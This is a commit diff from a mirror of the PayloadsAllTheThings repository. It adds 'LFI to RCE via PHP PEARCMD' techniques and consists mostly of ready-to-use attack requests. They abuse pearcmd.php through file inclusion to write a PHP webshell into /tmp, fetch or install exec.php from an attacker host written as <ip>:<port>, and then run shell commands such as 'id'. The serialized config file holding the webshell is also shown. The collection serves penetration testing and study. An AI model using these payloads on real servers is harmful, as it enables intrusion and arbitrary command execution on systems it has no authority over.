mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 18:40:41 +00:00
Merge pull request #692 from jlkl/master
Add two methods about LFI to RCE via PHP PEARCMD
This commit is contained in:
commit
d93a228b40
1 changed files with 24 additions and 9 deletions
|
@ -507,7 +507,7 @@ The file `pearcmd.php` uses `$_SERVER['argv']` to get its arguments. The directi
|
|||
register_argc_argv = On
|
||||
```
|
||||
|
||||
There are two ways to exploit it.
|
||||
There are this ways to exploit it.
|
||||
|
||||
* Method 1: config create
|
||||
```ps1
|
||||
|
@ -516,16 +516,31 @@ There are two ways to exploit it.
|
|||
```
|
||||
* Method 2: man_dir
|
||||
```ps1
|
||||
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+"
|
||||
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+
|
||||
/vuln.php?file=/tmp/exec.php&c=id
|
||||
```
|
||||
The created configuration file contains the webshell.
|
||||
```php
|
||||
#PEAR_Config 0.9
|
||||
a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"<?echo(system($_GET['c']));?>";}
|
||||
```
|
||||
|
||||
The created configuration file contains the webshell.
|
||||
|
||||
```php
|
||||
#PEAR_Config 0.9
|
||||
a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"<?echo(system($_GET['c']));?>";}
|
||||
```
|
||||
* Method 3: download
|
||||
|
||||
Need external network connection.
|
||||
```ps1
|
||||
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+download+http://<ip>:<port>/exec.php
|
||||
/vuln.php?file=exec.php&c=id
|
||||
```
|
||||
* Method 4: install
|
||||
|
||||
Need external network connection.
|
||||
|
||||
Notice that `exec.php` locates at `/tmp/pear/download/exec.php`.
|
||||
```ps1
|
||||
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+install+http://<ip>:<port>/exec.php
|
||||
/vuln.php?file=/tmp/pear/download/exec.php&c=id
|
||||
```
|
||||
|
||||
|
||||
## LFI to RCE via credentials files
|
||||
|
@ -581,4 +596,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
|
|||
* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
|
||||
* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
|
||||
* [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
|
||||
* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
|
||||
* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
|
||||
|
|
Loading…
Reference in a new issue